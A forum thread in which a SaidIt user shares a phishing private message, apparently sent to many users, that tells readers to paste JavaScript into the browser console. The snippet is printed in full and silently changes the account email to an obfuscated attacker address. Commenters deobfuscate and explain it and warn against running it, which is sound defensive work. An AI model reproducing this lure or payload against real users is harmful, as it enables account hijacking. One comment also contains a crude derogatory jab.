/u/magnora7 - Is this for real? If this is some kind of attack it's next level. I got this private message today, copypasted in the entirety, and I've tried to replicate the formatting and copied the links (I also have a screenshot I'll add).
submitted 3 years ago * by JasonCarswell from (self.AskSaidIt)
view the rest of the comments →
[–]JasonCarswell[S] 3 insightful - 2 fun3 insightful - 1 fun4 insightful - 1 fun4 insightful - 2 fun - 3 years ago* (12 children)
Why is it so anonymous? Why isn't it from /u/magnora7? When did /u/magnora7 suddenly decide to adopt a "SaidIt Team"? Sure he now has a few helpers but a "team"? That's a term I've been throwing around.
What does this do? (broken into 4 smaller chunks rather than one long line):
Paste this: d=document;d.getElementsByName('email')[0] .value='wxoxrixdi5x08x4x@0xppxpp.xcxoxm'.replaceAll ('x', '');d.getElementsByTagName('form')[1] .submit();location.href="https://www.saidit.net/"; Hit enter. You've just kicked the hacker out of your account!
d=document;d.getElementsByName('email')[0]
.value='wxoxrixdi5x08x4x@0xppxpp.xcxoxm'.replaceAll
('x', '');d.getElementsByTagName('form')[1]
.submit();location.href="https://www.saidit.net/";
[–][deleted] 3 years ago (4 children)
[removed]
[–][deleted] 5 insightful - 3 fun5 insightful - 2 fun6 insightful - 2 fun6 insightful - 3 fun - 3 years ago (3 children)
No, it just changes your email address, which allows the hacker to change your password. I don't think it actually works, though, after analyzing the code, because the attacker assumed the form uses POST, which it doesn't.
Regardless, I would never run that code if I was you, and if you did: make sure your email ain't been changed.
[–][deleted] 3 insightful - 2 fun3 insightful - 1 fun4 insightful - 1 fun4 insightful - 2 fun - 3 years ago (2 children)
because the attacker assumed the form uses POST, which it doesn't
It might be POST compatible. Once upon a time young lady, there was no javascript.
[–][deleted] 3 insightful - 2 fun3 insightful - 1 fun4 insightful - 1 fun4 insightful - 2 fun - 3 years ago (0 children)
I tried it by substituting their email for one of my own, and it didn't work.
[–][deleted] 1 insightful - 2 fun1 insightful - 1 fun2 insightful - 1 fun2 insightful - 2 fun - 3 years ago (0 children)
It's a dude bro. A dude who roleplays having a female penis.
[–][deleted] 6 insightful - 2 fun6 insightful - 1 fun7 insightful - 1 fun7 insightful - 2 fun - 3 years ago (0 children)
It's JavaScript code. Do not run it!
'wxoxrixdi5x08x4x@0xppxpp.xcxoxm'.replaceAll('x', '') returns woridi5084@0pppp.com That's the attacker's email address — looks like a scam address to me. They probably obfuscated it so they wouldn't get reported to their email provider, and so you wouldn't immediately recognize it as an email address.
'wxoxrixdi5x08x4x@0xppxpp.xcxoxm'.replaceAll('x', '')
woridi5084@0pppp.com
d.getElementsByName('email')[0].value sets your email address to the email above, but doesn't actually change it.
d.getElementsByName('email')[0].value
d.getElementsByTagName('form')[1].submit() submits the form to change your email. I don't think that actually works, BTW, so if you did run the code: you're probably safe. (But still make sure your email hasn't been changed!) That page didn't use POST when I set my email address, so I think it just uses JavaScript.
d.getElementsByTagName('form')[1].submit()
location.href="https://www.saidit.net/"; Just redirects you to the home page.
location.href="https://www.saidit.net/";
Even if the code did work: this is a terrible way to hack into someone's account, since I don't know anyone who would actually paste a block of code into their console... you'd have to be a literal rock to fall for it.
But if yall get so'm like this again: send me the code and I'll figure out what it does no matter how hard they try to obfuscate it.
[–]LarrySwinger2 5 insightful - 2 fun5 insightful - 1 fun6 insightful - 1 fun6 insightful - 2 fun - 3 years ago (5 children)
Please simply remove the code you pasted, in case anyone tries. I hope you haven't done what it says. If you have: please change your password ASAP.
[–]JasonCarswell[S] 3 insightful - 3 fun3 insightful - 2 fun4 insightful - 2 fun4 insightful - 3 fun - 3 years ago (0 children)
Removed from the OP, but I left it, broken above for analysis.
[–][deleted] 3 insightful - 2 fun3 insightful - 1 fun4 insightful - 1 fun4 insightful - 2 fun - 3 years ago* (3 children)
And make sure your email address hasn't been changed u/JasonCarswell.
[–]JasonCarswell[S] 2 insightful - 2 fun2 insightful - 1 fun3 insightful - 1 fun3 insightful - 2 fun - 3 years ago (2 children)
I didn't plug it in. The whole thing seemed beyond fishy. My reason for immediately shouting it out was to warn people. Plus I wondered if it had come up before to others.
[–]send_nasty_stuff 3 insightful - 2 fun3 insightful - 1 fun4 insightful - 1 fun4 insightful - 2 fun - 3 years ago (0 children)
I got a message as well. It must have gone out to most of saidit.
[–][deleted] 2 insightful - 2 fun2 insightful - 1 fun3 insightful - 1 fun3 insightful - 2 fun - 3 years ago (0 children)
Great! I don't think anyone would actually fall for it, though (even if the code worked).
use the following search parameters to narrow your results:
e.g. sub:pics site:imgur.com dog
sub:pics site:imgur.com dog
advanced search: by author, sub...
~3 users here now
Ask the community of saidit a question!
view the rest of the comments →
[–]JasonCarswell[S] 3 insightful - 2 fun3 insightful - 1 fun4 insightful - 1 fun4 insightful - 2 fun - (12 children)
[–][deleted] (4 children)
[removed]
[–][deleted] 5 insightful - 3 fun5 insightful - 2 fun6 insightful - 2 fun6 insightful - 3 fun - (3 children)
[–][deleted] 3 insightful - 2 fun3 insightful - 1 fun4 insightful - 1 fun4 insightful - 2 fun - (2 children)
[–][deleted] 3 insightful - 2 fun3 insightful - 1 fun4 insightful - 1 fun4 insightful - 2 fun - (0 children)
[–][deleted] 1 insightful - 2 fun1 insightful - 1 fun2 insightful - 1 fun2 insightful - 2 fun - (0 children)
[–][deleted] 6 insightful - 2 fun6 insightful - 1 fun7 insightful - 1 fun7 insightful - 2 fun - (0 children)
[–]LarrySwinger2 5 insightful - 2 fun5 insightful - 1 fun6 insightful - 1 fun6 insightful - 2 fun - (5 children)
[–]JasonCarswell[S] 3 insightful - 3 fun3 insightful - 2 fun4 insightful - 2 fun4 insightful - 3 fun - (0 children)
[–][deleted] 3 insightful - 2 fun3 insightful - 1 fun4 insightful - 1 fun4 insightful - 2 fun - (3 children)
[–]JasonCarswell[S] 2 insightful - 2 fun2 insightful - 1 fun3 insightful - 1 fun3 insightful - 2 fun - (2 children)
[–]send_nasty_stuff 3 insightful - 2 fun3 insightful - 1 fun4 insightful - 1 fun4 insightful - 2 fun - (0 children)
[–][deleted] 2 insightful - 2 fun2 insightful - 1 fun3 insightful - 1 fun3 insightful - 2 fun - (0 children)